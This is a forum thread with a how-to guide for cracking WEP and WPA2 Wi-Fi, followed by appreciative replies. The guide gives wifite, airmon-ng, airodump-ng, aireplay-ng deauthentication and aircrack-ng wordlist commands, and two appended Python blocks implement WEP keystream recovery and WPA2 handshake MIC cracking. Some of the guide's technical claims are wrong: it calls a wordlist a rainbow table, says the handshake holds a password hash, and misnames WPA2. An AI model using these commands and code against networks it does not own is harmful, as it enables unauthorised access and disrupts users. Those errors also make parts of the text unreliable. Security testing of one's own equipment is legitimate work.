How to Break into WEP and WPA2 Secured Access Points


Post by G3N3T1C5 on Mon Aug 11, 2014 11:02 pm

Written by G3N3T1C5

Over the course of the past several months I have spent a good bit of time diving into this subject and thought I would share it with the community. This is meant to be simple and comprehensive, giving a basic understanding of the vulnerabilities in each of these security protocols and a how-to guide on attacking each of them.

What you will need

VMWare or VirtualBox
Kali Linux VM
External WiFi Dongle
(I use a TP-Link TL-WN722N)

Breaking into a WEP Secured Access Point

Wired Equivalent Privacy (WEP) is an outdated security algorithm and has been superseded by Wireless Protected Access (WPA/WPA2). It is important to understand why it is flawed, and if you know anyone who is still using WEP, please let them know how easy it is to penetrate. Over the past year I took a Wireless Networking course in which, in one of the classes, the instructor set up a WEP-secured router and we were to break into it. Using a simple tool supplied in the Kali Linux suite called Wifite, I was able to get the key in 36 seconds. Hopefully this gives you an understanding of how insecure WEP is.
Without going into extreme detail, the principle behind finding the passphrase is capturing Initialization Vectors (IVs), also called Starting Variables (SVs). WEP uses a stream cipher called RC4 (ARCFOUR) and cannot have the same traffic key used twice. IVs are used to prevent repetition in the key stream. But when a network is busy with traffic there is a high probability an IV will eventually repeat.

We are going to use wifite for breaking WEP
Open up a command prompt in Kali and type:
wifite -wep
[screenshot]

The program should begin and put your Wi-Fi adapter in monitor mode, and because we added -wep to the command it will listen for only WEP-secured networks. If you have a router to test this out with, wait until it displays the SSID you chose. When wifite has found it, press CTRL+C, type in the number that your SSID appeared on in the list, then press Enter. Wifite should begin its attack on the network.
[screenshot]

As you can see from the picture above, at around 10,000 IVs it will start cracking the passphrase and will display it for you once it is done. One thing about Wifite that I haven't had too much luck with, but hopefully those of you who use this guide will, is that it performs various attacks to help obtain the key quicker, such as an ARP replay attack. If there is no traffic on the network it will take forever gathering over 10,000 IVs. Basically, an ARP replay attack will generate traffic so that you do not have to wait for a client on the network to do it.

Breaking into a WPA2 Secured Access Point

WPA2 (Wireless Point Access 2) is what is used to secure most access points today. This typically takes much longer to break into than a WEP-secured network. Instead of capturing IVs, we need to capture a WPA handshake, which happens when a client connects to an access point. In this 4-way handshake is the hash encryption of the plaintext password for the network; fortunately for us, and yet unfortunately for us, the purpose of a hash is to prevent a hacker from ever finding out the plaintext password. So once we have captured the handshake, we will run a rainbow table against the hash. Kali Linux already has a rainbow table in it called rockyou.txt, which has around 14,000,000 passwords in it. If you end up wanting a larger rainbow table there are more available on the internet; the largest I have found is 1.43 billion passwords. There will be 5 steps to breaking into a WPA2-secured access point.
1. Find out the BSSID (Basic Service Set ID) or MAC (Media Access Control) address of the access point.
2. Begin to monitor traffic from the clients to the access point.
3. Launch a DeAuth (de-authentication) attack against a client within the network.
4. Capture the handshake from the client we have de-authenticated from the network when it re-connects.
5. Run aircrack using our rockyou.txt rainbow table to obtain the password.

We need to first find out what is the interface for our Wi-Fi dongle.

STEP 1: In a command terminal type iwconfig and your adapter should display, typically as wlan0 for the interface. After that we need to put it in monitor mode.
root@kali:~# airmon-ng start wlan0
root@kali:~# airodump-ng mon0
It should display the different Wi-Fi networks that are around you and the clients your adapter can see connected to them. You will need the BSSID and the CH (Channel) for the next part.

[screenshot]

STEP 2:

After we have found this information out about the network we will now narrow our view to just that access point and its clients, as well as write a file when the WPA handshake is found.
root@kali:~# airodump-ng -c (your channel) --bssid (MAC address of the access point) -w (whatyouwanttocallthefile) mon0 (the monitor interface we set earlier)
Here is an example:
root@kali:~# airodump-ng -c 1 --bssid 00:FF:1C:A2:90:1D -w pentest mon0

You should see something like this:
[screenshot]

This needs to stay running until a Handshake is captured. We can either leave it on and wait for a client to join the network or we can force a client to rejoin using a DeAuth attack.

STEP 3 and STEP 4:

This step will be short and sweet; you will need both the MAC address of the access point and the client.
To launch the attack, open up another terminal; do not close the one monitoring traffic. In the new command prompt type:
aireplay-ng -0 25 -a (MAC of Access Point) -c (MAC of Client) mon0 (interface)
Example:
aireplay-ng -0 25 -a 00:FF:1C:A2:90:1D -c 99:C4:FF:5F:8A:B8 mon0
This will cause the client to disconnect from the network, and when the attack stops the client will rejoin and you will capture a WPA handshake. The number "25" in the line is how many times aireplay will send DeAuths to the client. If a few minutes go by and you still haven't captured a handshake, you may want to send another attack and increase the number.

[screenshot]

STEP 5:
Once it shows that you have captured a WPA handshake (if you did, it will display next to the time and date, circled green in my screenshot) press CTRL+C to stop airodump. We are now going to run aircrack with our rainbow table against the handshake; if the password is in our database, it will compare the two hashes and, if they match, display the password for you. I chose a password that I knew was in the rockyou.txt table. At a rate of 600 keys a second it should take you around 8 hours to go through the entire file.
The command is: aircrack-ng -w rockyou.txt (what you chose for the name of the capture file)-01.cap
Example: aircrack-ng -w rockyou.txt pentest-01.cap

[screenshot]

This concludes my guide on WEP and WPA2.
If you liked this guide or have questions you can leave a comment and I will try and respond to you soon =)

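The WEP paragraph above explains that the danger is a repeated IV. The block below is an added example, not part of the original post, showing concretely why: WEP seeds RC4 with IV || key, so two frames with the same 24-bit IV share a keystream, and the known fixed header of an ARP request (which is what the ARP-replay attack keeps re-injecting) lets an attacker recover that keystream with one XOR and read the start of any other frame sent under the same IV, without learning the key. The WEP key, IV, ARP frame and "secret" data frame are constructed for this example; the key-ID byte that follows the IV on the air is omitted. The RC4 and WEP routines are written here from the published algorithm and are not aircrack-ng's or wifite's code.

```python
import struct
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4 (ARCFOUR): key scheduling, then `length` bytes of keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body (key-ID byte omitted):
    IV (3 bytes, sent in clear) || RC4_{IV || key}(plaintext || CRC-32 ICV)."""
    icv = struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)
    body = plaintext + icv
    return iv + xor(body, rc4_keystream(iv + key, len(body)))


def recover_keystream(frame: bytes, known_prefix: bytes):
    """Known-plaintext attack: keystream = ciphertext XOR plaintext for every
    byte whose plaintext the attacker knows. The WEP key is never needed."""
    iv, ct = frame[:3], frame[3:]
    return iv, xor(ct[: len(known_prefix)], known_prefix)


def decrypt_with_keystream(frame: bytes, iv: bytes, keystream: bytes) -> bytes:
    """Read the start of any other frame encrypted under the same IV."""
    if frame[:3] != iv:
        raise ValueError("keystream is only valid for the IV it was recovered under")
    return xor(frame[3 : 3 + len(keystream)], keystream)


def iv_collision_leak(frame_a: bytes, frame_b: bytes) -> bytes:
    """Even with no known plaintext: C_a XOR C_b == P_a XOR P_b when IVs match."""
    if frame_a[:3] != frame_b[:3]:
        raise ValueError("frames use different IVs")
    return xor(frame_a[3:], frame_b[3:])


# Constructed sample data for this example (not from a real capture).
WEP_KEY = bytes.fromhex("0123456789")       # 40-bit WEP key, unknown to the attacker
IV = bytes.fromhex("0c0d0e")                # the IV the access point happens to reuse
# Every Ethernet/IPv4 ARP request starts with the same 16 bytes:
# LLC/SNAP header AA AA 03 00 00 00 08 06, then ARP header 00 01 08 00 06 04 00 01.
KNOWN_ARP_PREFIX = bytes.fromhex("aaaa030000000806" "0001080006040001")
ARP_REQUEST = KNOWN_ARP_PREFIX + bytes(20)  # hardware/protocol addresses (constructed)
SECRET = b"GET /admin?token=s3cr3t HTTP/1.1"  # another station's traffic (constructed)


def demo_leaked_prefix() -> bytes:
    """Two frames under the same IV: the ARP request (known plaintext) and a
    data frame the attacker wants to read. Returns what the attacker recovers."""
    arp_frame = wep_encrypt(WEP_KEY, IV, ARP_REQUEST)
    secret_frame = wep_encrypt(WEP_KEY, IV, SECRET)
    iv, keystream = recover_keystream(arp_frame, KNOWN_ARP_PREFIX)
    return decrypt_with_keystream(secret_frame, iv, keystream)


if __name__ == "__main__":
    print(demo_leaked_prefix())  # first 16 bytes of SECRET, recovered without the key
```

Only the first 16 bytes are recovered here because only 16 bytes of the ARP plaintext are assumed known; the full-key recovery that aircrack-ng performs (FMS/KoreK/PTW) builds on the same observation, collecting many IV-keystream pairs and using the statistical weaknesses of RC4's key scheduling to vote on the key bytes.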

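One correction a practitioner will want alongside the WPA2 steps: the 4-way handshake does not contain a hash of the password, and rockyou.txt is a plain wordlist (on Kali it ships compressed at /usr/share/wordlists/rockyou.txt.gz), not a rainbow table. What airodump-ng captures is the two nonces, the two MAC addresses and an EAPOL-Key frame carrying a MIC computed with a key derived from the passphrase and the SSID. aircrack-ng therefore re-derives that key for every wordlist candidate and compares MICs; because the SSID salts the derivation, a generic precomputed table cannot be reused across networks. The block below is an added example, not code from the original post or from aircrack-ng, implementing that check end to end. It uses the BSSID and client MAC from the guide's own example, the published IEEE 802.11i PBKDF2 test vector (SSID "IEEE", passphrase "password"), and constructed nonces and RSN IE; in the real attack the frame, nonces and MACs are read from the .cap file rather than produced by `capture_handshake`.

```python
import hashlib
import hmac
import struct

SSID = "IEEE"                                # IEEE 802.11i PBKDF2 test-vector SSID
PASSPHRASE = "password"                      # ... and passphrase (the "unknown" PSK)
AP_MAC = bytes.fromhex("00ff1ca2901d")       # BSSID from the guide's airodump-ng example
STA_MAC = bytes.fromhex("99c4ff5f8ab8")      # client MAC from the guide's aireplay-ng example
ANONCE = bytes(range(32))                    # constructed nonces (real ones are random)
SNONCE = bytes(range(32, 64))
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020c00")  # CCMP/PSK, constructed
MIC_OFFSET = 81  # EAPOL hdr(4)+desc(1)+info(2)+len(2)+replay(8)+nonce(32)+iv(16)+rsc(8)+id(8)


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    The thousands of HMAC iterations per guess are what make PSK cracking slow."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)  # 4 x 20 bytes >= 64
    )
    return out[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from PMK, both MACs and both nonces; KCK is the first 16 bytes."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 / key descriptor version 2: MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]."""
    zeroed = eapol_frame[:MIC_OFFSET] + bytes(16) + eapol_frame[MIC_OFFSET + 16 :]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_message2(snonce: bytes, rsn_ie: bytes) -> bytes:
    """EAPOL-Key frame for message 2 of the 4-way handshake, MIC field zeroed."""
    body = (
        b"\x02"                       # RSN key descriptor
        + b"\x01\x0a"                 # key info: version 2, pairwise, MIC present
        + b"\x00\x10"                 # key length
        + struct.pack(">Q", 1)        # replay counter
        + snonce
        + bytes(16) + bytes(8) + bytes(8)  # key IV, key RSC, key ID
        + bytes(16)                   # MIC placeholder
        + struct.pack(">H", len(rsn_ie)) + rsn_ie
    )
    return b"\x01\x03" + struct.pack(">H", len(body)) + body


def capture_handshake() -> bytes:
    """Plays the legitimate client: message 2 with a valid MIC. Stands in for
    the frame airodump-ng writes to pentest-01.cap."""
    pmk = pmk_from_passphrase(PASSPHRASE, SSID)
    kck = derive_ptk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    frame = build_message2(SNONCE, RSN_IE)
    mic = eapol_mic(kck, frame)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16 :]


def crack(wordlist, ssid, aa, spa, anonce, snonce, eapol_frame):
    """What aircrack-ng -w does per candidate: derive PMK -> PTK -> KCK, recompute
    the MIC and compare with the captured one. Returns the passphrase or None."""
    captured_mic = eapol_frame[MIC_OFFSET : MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = derive_ptk(pmk, aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame), captured_mic):
            return candidate
    return None


WORDLIST = ["123456", "letmein", "password", "qwerty"]  # stands in for rockyou.txt


def demo():
    return crack(WORDLIST, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, capture_handshake())


if __name__ == "__main__":
    print(demo())
```

Two things follow from this that the guide's rate estimate hints at: every guess costs a full PBKDF2 run, so speed is bounded by SHA-1 throughput rather than by disk, and a precomputed table is only useful if it was built for the exact SSID being attacked.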
Re: How to Break into WEP and WPA2 Secured Access Points

Post by Randoph on Tue Aug 12, 2014 3:41 am

Just wanna thank you for sharing this, it helps a noob like me out a lot. I'm just gonna save this post and look into it later, when I have a bit more knowledge about networking, and I'm not home at the moment anyway.


Re: How to Break into WEP and WPA2 Secured Access Points

Post by G3N3T1C5 on Wed Aug 13, 2014 7:29 am

Randoph wrote: Just wanna thank you for sharing this, it helps a noob like me out a lot. I'm just gonna save this post and look into it later, when I have a bit more knowledge about networking, and I'm not home at the moment anyway.


Thanks, I'm glad you found it useful. If you have any more questions feel free to ask and I will do my best to answer them.


Re: How to Break into WEP and WPA2 Secured Access Points

Post by -Ninjex- on Wed Aug 13, 2014 7:37 am

Nice tutorial for beginners, you should turn this into an article.
A word of advice: next time scale down the images, they are too big on display.


Re: How to Break into WEP and WPA2 Secured Access Points

Post by Solucian on Wed Aug 13, 2014 10:26 am

Great post, thanks for sharing! The WEP part was a bit vague imo (or maybe I just don't know enough about it), but WPA/WPA2 was explained really well.


Re: How to Break into WEP and WPA2 Secured Access Points

Post by G3N3T1C5 on Wed Aug 13, 2014 10:41 am

-Ninjex- wrote: Nice tutorial for beginners, you should turn this into an article.
A word of advice: next time scale down the images, they are too big on display.


Thank you ^_^ The images are definitely larger than I would like them to be; I'll go through and scale them so they aren't so bulky. Thanks for the suggestion :D

-- Wed Aug 13, 2014 10:46 am --

Solucian wrote: Great post, thanks for sharing! The WEP part was a bit vague imo (or maybe I just don't know enough about it), but WPA/WPA2 was explained really well.


Thanks for your input, I'll try and touch up the part on WEP when I have some time, and you're welcome!


Re: How to Break into WEP and WPA2 Secured Access Points

Post by cyberdrain on Wed Aug 13, 2014 8:44 pm

Next up, WPS! At least, that's what I hope for, I like to read different opinions on it. Nice guide OP, keep them coming :)


Re: How to Break into WEP and WPA2 Secured Access Points

Post by G3N3T1C5 on Thu Aug 14, 2014 5:13 pm

cyberdrain wrote: Next up, WPS! At least, that's what I hope for, I like to read different opinions on it. Nice guide OP, keep them coming :)


Sure, I will try to make a decent guide on exploiting Wireless Protected Setup (what a joke). Just gotta find some downtime to begin that project along with a few others, but thanks for taking time to let me know you liked this guide.